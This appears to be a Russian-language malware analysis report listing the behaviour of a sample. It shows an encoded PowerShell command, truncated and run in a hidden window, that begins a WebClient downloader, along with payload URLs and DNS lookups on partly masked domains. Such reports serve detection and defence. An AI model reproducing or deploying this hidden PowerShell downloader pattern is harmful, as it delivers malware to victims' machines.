Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8AMQBfADUAXwA9ACgAJwBCAF8AXwAnACsAJwBfADIANAA1ACcAKQA7ACQAQQAzADQANwAwADkAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgA2AF8AMgA1ADIAMgA9ACgAJwBoAHQAJwArAC...
- '35.##4.251.94':80
- 'fo####mafound.org':80
- 'po###irale.com':80
- 'ed##nta.com':80
- 'ed##nta.com':443
- http://fo####mafound.org/wvvw/unKeiHfM4yykPTCnP
- http://po###irale.com/88IIx8tsZCiqB
- http://ed##nta.com/wp-content/rDaOutqPT8a
- 'ed##nta.com':443
- DNS ASK fo####mafound.org
- DNS ASK po###irale.com
- DNS ASK sa###tgroup.ir
- DNS ASK ed##nta.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8AMQBfADUAXwA9ACgAJwBCAF8AXwAnACsAJwBfADIANAA1ACcAKQA7ACQAQQAzADQANwAwADkAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgA2AF8AMgA1ADIAMgA9ACgAJwBoAHQAJwArAC...' (со скрытым окном)